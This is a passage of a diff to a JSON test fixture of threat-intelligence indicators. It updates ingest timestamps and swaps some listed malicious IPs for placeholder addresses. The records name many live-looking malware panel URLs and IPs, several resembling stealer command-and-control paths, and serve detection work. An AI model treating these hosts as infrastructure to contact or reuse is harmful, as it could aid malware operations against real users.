'http://chol.cc/Work5/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:03.396Z\"}", "category": "threat", "type": "indicator", @@ -994,7 +994,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385127594Z", + "ingested": "2021-12-13T08:38:40.022686400Z", "original": "{\"created\":\"2020-01-22T03:00:03.642Z\",\"description\":\"TS ID: 55241332320; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--f03f098d-2fa9-49e1-a7dd-02518aa105fa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-22T03:00:03.642Z\",\"name\":\"mal_url: http://mecharnise.ir/ca4/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mecharnise.ir/ca4/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:03.642Z\"}", "category": "threat", "type": "indicator", @@ -1046,7 +1046,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385131771Z", + "ingested": "2021-12-13T08:38:40.022690600Z", "original": "{\"created\":\"2020-01-22T03:00:27.534Z\",\"description\":\"TS ID: 55241332367; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--e72e3ba0-7de5-46bb-ab1e-efdf3e0a0b3b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-22T03:00:27.534Z\",\"name\":\"mal_url: http://chol.cc/Work4/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://chol.cc/Work4/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:27.534Z\"}", "category": "threat", "type": "indicator", @@ -1098,7 +1098,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385135849Z", + "ingested": "2021-12-13T08:38:40.022695200Z", "original": "{\"created\":\"2020-01-22T03:00:27.591Z\",\"description\":\"TS ID: 55241332317; iType: mal_url; State: active; Org: SoftLayer Technologies; Source: CyberCrime\",\"id\":\"indicator--d6b59b66-5020-4368-85a7-196026856ea9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-78\"],\"modified\":\"2020-01-22T03:00:27.591Z\",\"name\":\"mal_url: http://kironofer.com/webpanel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://kironofer.com/webpanel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:27.591Z\"}", "category": "threat", "type": "indicator", @@ -1150,7 +1150,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385140057Z", + "ingested": "2021-12-13T08:38:40.022699300Z", "original": "{\"created\":\"2020-01-22T03:00:45.787Z\",\"description\":\"TS ID: 55241332309; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--aff7b07f-acc7-4bec-ab19-1fce972bfd09\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-22T03:00:45.787Z\",\"name\":\"mal_url: http://worldatdoor.in/panel2/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/panel2/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:45.787Z\"}", "category": "threat", "type": "indicator", @@ -1202,7 +1202,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385144155Z", + "ingested": "2021-12-13T08:38:40.022706200Z", "original": "{\"created\":\"2020-01-22T03:00:45.841Z\",\"description\":\"TS ID: 55241332286; iType: mal_url; State: active; Org: Garanntor-Hosting; Source: CyberCrime\",\"id\":\"indicator--ba71ba3a-1efd-40da-ab0d-f4397d6fc337\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-22T03:00:45.841Z\",\"name\":\"mal_url: http://smartlinktelecom.top/kings/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://smartlinktelecom.top/kings/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:45.841Z\"}", "category": "threat", "type": "indicator", @@ -1254,7 +1254,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385148383Z", + "ingested": "2021-12-13T08:38:40.022711900Z", "original": "{\"created\":\"2020-01-22T03:00:45.959Z\",\"description\":\"TS ID: 55241332339; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--17777e7f-3e91-4446-a43d-79139de8a948\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-64\"],\"modified\":\"2020-01-22T03:00:45.959Z\",\"name\":\"mal_url: http://carirero.net/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://carirero.net/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:45.959Z\"}", "category": "threat", "type": "indicator", @@ -1273,7 +1273,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 74.116.84.20", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55241332319; iType: mal_ip; State: active; Org: SoftLayer Technologies; Source: CyberCrime", "modified": "2020-01-22T03:00:46.025Z", "valid_from": "2020-01-22T03:00:46.025Z", @@ -1295,12 +1295,12 @@ "first_seen": "2020-01-22T03:00:46.025Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "74.116.84.20" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385153071Z", - "original": "{\"created\":\"2020-01-22T03:00:46.025Z\",\"description\":\"TS ID: 55241332319; iType: mal_ip; State: active; Org: SoftLayer Technologies; Source: CyberCrime\",\"id\":\"indicator--f6be1804-cfe4-4f41-9338-2b65f5b1dda1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-30\"],\"modified\":\"2020-01-22T03:00:46.025Z\",\"name\":\"mal_ip: 74.116.84.20\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '74.116.84.20']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:46.025Z\"}", + "ingested": "2021-12-13T08:38:40.022719600Z", + "original": "{\"created\":\"2020-01-22T03:00:46.025Z\",\"description\":\"TS ID: 55241332319; iType: mal_ip; State: active; Org: SoftLayer Technologies; Source: CyberCrime\",\"id\":\"indicator--f6be1804-cfe4-4f41-9338-2b65f5b1dda1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-30\"],\"modified\":\"2020-01-22T03:00:46.025Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:46.025Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1350,7 +1350,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385157780Z", + "ingested": "2021-12-13T08:38:40.022727Z", "original": "{\"created\":\"2020-01-22T03:00:57.729Z\",\"description\":\"TS ID: 55241332305; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--b4fd8489-9589-4f70-996c-84989245a21b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-43\"],\"modified\":\"2020-01-22T03:00:57.729Z\",\"name\":\"mal_url: http://tuu.nu/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tuu.nu/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:57.729Z\"}", "category": "threat", "type": "indicator", @@ -1402,7 +1402,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385162710Z", + "ingested": "2021-12-13T08:38:40.022734400Z", "original": "{\"created\":\"2020-01-22T03:01:02.696Z\",\"description\":\"TS ID: 55241332346; iType: mal_url; State: active; Org: Ifx Networks Colombia; Source: CyberCrime\",\"id\":\"indicator--bc50c62f-a015-4460-87df-2137626877e3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-36\"],\"modified\":\"2020-01-22T03:01:02.696Z\",\"name\":\"mal_url: http://dulfix.com/cgi-bins/dulfix/gustav57/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dulfix.com/cgi-bins/dulfix/gustav57/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:02.696Z\"}", "category": "threat", "type": "indicator", @@ -1454,7 +1454,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385167338Z", + "ingested": "2021-12-13T08:38:40.022741900Z", "original": "{\"created\":\"2020-01-22T03:01:02.807Z\",\"description\":\"TS ID: 55241332323; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--2765af4b-bfb7-4ac8-82d2-ab6ed8a52461\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-65\"],\"modified\":\"2020-01-22T03:01:02.807Z\",\"name\":\"mal_url: http://deliciasdvally.com.pe/includes/gter/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://deliciasdvally.com.pe/includes/gter/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:02.807Z\"}", "category": "threat", "type": "indicator", @@ -1506,7 +1506,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385172057Z", + "ingested": "2021-12-13T08:38:40.022749200Z", "original": "{\"created\":\"2020-01-22T03:01:24.81Z\",\"description\":\"TS ID: 55241332399; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--9c0e63a1-c32a-470a-bf09-51488e239c63\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-22T03:01:24.81Z\",\"name\":\"mal_url: http://nkpotu.xyz/Kpot1/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nkpotu.xyz/Kpot1/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:24.81Z\"}", "category": "threat", "type": "indicator", @@ -1525,7 +1525,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 194.87.147.80", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55241332328; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime", "modified": "2020-01-22T03:01:41.158Z", "valid_from": "2020-01-22T03:01:41.158Z", @@ -1547,12 +1547,12 @@ "first_seen": "2020-01-22T03:01:41.158Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "194.87.147.80" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385186564Z", - "original": "{\"created\":\"2020-01-22T03:01:41.158Z\",\"description\":\"TS ID: 55241332328; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--8047678e-20be-4116-9bc4-7bb7c26554e0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-22T03:01:41.158Z\",\"name\":\"mal_ip: 194.87.147.80\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '194.87.147.80']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:41.158Z\"}", + "ingested": "2021-12-13T08:38:40.022756600Z", + "original": "{\"created\":\"2020-01-22T03:01:41.158Z\",\"description\":\"TS ID: 55241332328; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--8047678e-20be-4116-9bc4-7bb7c26554e0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-22T03:01:41.158Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:41.158Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1603,7 +1603,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385207393Z", + "ingested": "2021-12-13T08:38:40.022764Z", "original": "{\"created\":\"2020-01-22T03:01:57.189Z\",\"description\":\"TS ID: 55241332377; iType: mal_url; State: active; Org: A100 ROW GmbH; Source: CyberCrime\",\"id\":\"indicator--c57a880c-1ce0-45de-9bab-fb2910454a61\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-01-22T03:01:57.189Z\",\"name\":\"mal_url: http://35.158.92.3/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://35.158.92.3/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:57.189Z\"}", "category": "threat", "type": "indicator", @@ -1622,7 +1622,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 45.95.168.70", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55241332101; iType: mal_ip; State: active; Source: CyberCrime", "modified": "2020-01-22T03:01:57.279Z", "valid_from": "2020-01-22T03:01:57.279Z", @@ -1644,12 +1644,12 @@ "first_seen": "2020-01-22T03:01:57.279Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "45.95.168.70" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385215689Z", - "original": "{\"created\":\"2020-01-22T03:01:57.279Z\",\"description\":\"TS ID: 55241332101; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--6056152c-0fa5-4e34-871a-3c8990f1ee46\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-42\"],\"modified\":\"2020-01-22T03:01:57.279Z\",\"name\":\"mal_ip: 45.95.168.70\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '45.95.168.70']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:57.279Z\"}", + "ingested": "2021-12-13T08:38:40.022771300Z", + "original": "{\"created\":\"2020-01-22T03:01:57.279Z\",\"description\":\"TS ID: 55241332101; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--6056152c-0fa5-4e34-871a-3c8990f1ee46\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-42\"],\"modified\":\"2020-01-22T03:01:57.279Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:57.279Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1700,7 +1700,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385220989Z", + "ingested": "2021-12-13T08:38:40.022775800Z", "original": "{\"created\":\"2020-01-22T03:02:50.57Z\",\"description\":\"TS ID: 55241332357; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--23215acb-4989-4434-ac6d-8f9367734f0f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-22T03:02:50.57Z\",\"name\":\"mal_url: http://chol.cc/Work7/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://chol.cc/Work7/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:02:50.57Z\"}", "category": "threat", "type": "indicator", @@ -1751,7 +1751,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385226279Z", + "ingested": "2021-12-13T08:38:40.022780400Z", "original": "{\"created\":\"2020-01-22T03:02:52.496Z\",\"description\":\"TS ID: 55241332289; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--452ece92-9ff2-4f99-8a7f-fd614ebea8cf\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-26\"],\"modified\":\"2020-01-22T03:02:52.496Z\",\"name\":\"mal_url: http://f0391600.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391600.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:02:52.496Z\"}", "category": "threat", "type": "indicator", @@ -1803,7 +1803,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385230847Z", + "ingested": "2021-12-13T08:38:40.022784800Z", "original": "{\"created\":\"2020-01-22T03:03:42.819Z\",\"description\":\"TS ID: 55241332334; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--10958d74-ec60-41af-a1ab-1613257e670f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-01-22T03:03:42.819Z\",\"name\":\"mal_url: http://extraclick.space/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://extraclick.space/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:03:42.819Z\"}", "category": "threat", "type": "indicator", @@ -1855,7 +1855,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385235326Z", + "ingested": "2021-12-13T08:38:40.022790300Z", "original": "{\"created\":\"2020-01-22T03:03:52.044Z\",\"description\":\"TS ID: 55241332326; iType: mal_url; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--19556daa-6293-400d-8706-d0baa6b16b7a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-22T03:03:52.044Z\",\"name\":\"mal_url: http://petrogarmani.pw/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://petrogarmani.pw/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:03:52.044Z\"}", "category": "threat", "type": "indicator", @@ -1907,7 +1907,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385239654Z", + "ingested": "2021-12-13T08:38:40.022794500Z", "original": "{\"created\":\"2020-01-22T03:04:01.65Z\",\"description\":\"TS ID: 55241332311; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--b09d9be9-6703-4a7d-a066-2baebb6418fc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-22T03:04:01.65Z\",\"name\":\"mal_url: http://worldatdoor.in/mighty/32/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/mighty/32/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:04:01.65Z\"}", "category": "threat", "type": "indicator", @@ -1958,7 +1958,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385244473Z", + "ingested": "2021-12-13T08:38:40.022798700Z", "original": "{\"created\":\"2020-01-22T03:04:32.717Z\",\"description\":\"TS ID: 55241332341; iType: mal_url; State: active; Org: Institute of Philosophy, Russian Academy of Scienc; Source: CyberCrime\",\"id\":\"indicator--43febf7d-4185-4a12-a868-e7be690b14aa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-01-22T03:04:32.717Z\",\"name\":\"mal_url: http://zanlma.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://zanlma.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:04:32.717Z\"}", "category": "threat", "type": "indicator", @@ -2009,7 +2009,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385248811Z", + "ingested": "2021-12-13T08:38:40.022802600Z", "original": "{\"created\":\"2020-01-22T03:04:56.858Z\",\"description\":\"TS ID: 55241332303; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--a34728e6-f91d-47e6-a4d8-a69176299e45\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-22T03:04:56.858Z\",\"name\":\"mal_url: http://f0369688.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0369688.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:04:56.858Z\"}", "category": "threat", "type": "indicator", @@ -2061,7 +2061,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385253099Z", + "ingested": "2021-12-13T08:38:40.022806800Z", "original": "{\"created\":\"2020-01-22T03:04:59.245Z\",\"description\":\"TS ID: 55241332380; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--ac821704-5eb2-4f8f-a8b6-2a168dbd0e54\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-22T03:04:59.245Z\",\"name\":\"mal_url: http://chol.cc/Work2/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://chol.cc/Work2/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:04:59.245Z\"}", "category": "threat", "type": "indicator", @@ -2080,7 +2080,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 192.185.214.199", + "name": "mal_ip: 192.168.214.199", "description": "TS ID: 55245868747; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime", "modified": "2020-01-23T03:00:22.287Z", "valid_from": "2020-01-23T03:00:22.287Z", @@ -2102,12 +2102,12 @@ "first_seen": "2020-01-23T03:00:22.287Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "192.185.214.199" + "ip": "192.168.214.199" } }, "event": { - "ingested": "2021-12-13T05:57:34.385257427Z", - "original": "{\"created\":\"2020-01-23T03:00:22.287Z\",\"description\":\"TS ID: 55245868747; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--0d3e1bd8-0f16-4c22-b8a1-663ec255ad79\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-57\"],\"modified\":\"2020-01-23T03:00:22.287Z\",\"name\":\"mal_ip: 192.185.214.199\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '192.185.214.199']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:00:22.287Z\"}", + "ingested": "2021-12-13T08:38:40.022812200Z", + "original": "{\"created\":\"2020-01-23T03:00:22.287Z\",\"description\":\"TS ID: 55245868747; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--0d3e1bd8-0f16-4c22-b8a1-663ec255ad79\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-57\"],\"modified\":\"2020-01-23T03:00:22.287Z\",\"name\":\"mal_ip: 192.168.214.199\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '192.168.214.199']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:00:22.287Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2158,7 +2158,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385261615Z", + "ingested": "2021-12-13T08:38:40.022816900Z", "original": "{\"created\":\"2020-01-23T03:01:11.329Z\",\"description\":\"TS ID: 55245868770; iType: mal_url; State: active; Org: Mills College; Source: CyberCrime\",\"id\":\"indicator--2cdd130a-c884-402d-b63c-e03f9448f5d9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-24\"],\"modified\":\"2020-01-23T03:01:11.329Z\",\"name\":\"mal_url: http://softtouchcollars.com/Loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://softtouchcollars.com/Loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:01:11.329Z\"}", "category": "threat", "type": "indicator", @@ -2210,7 +2210,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385267366Z", + "ingested": "2021-12-13T08:38:40.022821500Z", "original": "{\"created\":\"2020-01-23T03:01:36.682Z\",\"description\":\"TS ID: 55245868769; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--88e98e13-4bfd-4188-941a-f696a7b86b71\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-01-23T03:01:36.682Z\",\"name\":\"mal_url: http://imobiliariatirol.com/gh/panelnew/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://imobiliariatirol.com/gh/panelnew/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:01:36.682Z\"}", "category": "threat", "type": "indicator", @@ -2262,7 +2262,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385272706Z", + "ingested": "2021-12-13T08:38:40.022825600Z", "original": "{\"created\":\"2020-01-23T03:02:15.854Z\",\"description\":\"TS ID: 55245868772; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--27323b7d-85d3-4e89-8249-b7696925a772\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-23T03:02:15.854Z\",\"name\":\"mal_url: http://deliveryexpressworld.xyz/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://deliveryexpressworld.xyz/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:02:15.854Z\"}", "category": "threat", "type": "indicator", @@ -2313,7 +2313,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385277305Z", + "ingested": "2021-12-13T08:38:40.022829900Z", "original": "{\"created\":\"2020-01-23T03:02:47.364Z\",\"description\":\"TS ID: 55245868766; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--b0639721-de55-48c6-b237-3859d61aecfb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-01-23T03:02:47.364Z\",\"name\":\"mal_url: http://f0392261.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0392261.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:02:47.364Z\"}", "category": "threat", "type": "indicator", @@ -2332,7 +2332,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://104.168.99.168/panel/panel/admin.php", + "name": "mal_url: 